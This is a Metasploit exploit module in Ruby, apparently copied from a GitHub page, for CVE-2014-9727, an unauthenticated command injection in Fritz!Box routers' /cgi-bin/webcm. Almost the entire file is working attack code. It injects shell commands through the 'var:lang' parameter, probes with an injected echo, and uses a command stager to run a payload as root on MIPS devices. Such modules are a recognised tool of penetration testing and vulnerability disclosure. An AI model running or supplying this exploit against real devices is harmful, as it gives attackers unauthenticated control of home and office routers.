Permalink
Fetching contributors…
Cannot retrieve contributors at this time
116 lines (105 sloc) 3.65 KB
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Fritz!Box Webcm Unauthenticated Command Injection',
'Description' => %q{
Different Fritz!Box devices are vulnerable to an unauthenticated OS command injection.
This module was tested on a Fritz!Box 7270 from the LAN side. The vendor reported the
following devices vulnerable: 7570, 7490, 7390, 7360, 7340, 7330, 7272, 7270,
7170 Annex A A/CH, 7170 Annex B English, 7170 Annex A English, 7140, 7113, 6840 LTE,
6810 LTE, 6360 Cable, 6320 Cable, 5124, 5113, 3390, 3370, 3272, 3270
},
'Author' =>
[
'Unknown', # Vulnerability discovery
'Fabian Braeunlein <fabian[at]breaking.systems>', # Metasploit PoC with wget method
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-9727' ],
[ 'OSVDB', '103289' ],
[ 'BID', '65520' ],
[ 'URL', 'http://www.kapple.de/?p=75' ], # vulnerability details with PoC
[ 'URL', 'https://www.speckmarschall.de/hoere.htm' ], # probably the first published details (now censored)
[ 'URL', 'http://pastebin.com/GnMKGmZ2' ], # published details uncensored from speckmarschall
[ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], # vendor site with a list of vulnerable devices
[ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] # writeup with PoC
],
'DisclosureDate' => 'Feb 11 2014',
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&echo -e \"\\n\\n#{clue}\""
}
})
if res && res.body =~ /#{clue}/
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/cgi-bin/webcm',
'method' => 'GET',
'vars_get' => {
"var:lang" => "&#{cmd}",
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit
print_status("Trying to access the vulnerable URL...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("Exploiting...")
execute_cmdstager(
flavor: :echo,
linemax: 92
)
end
end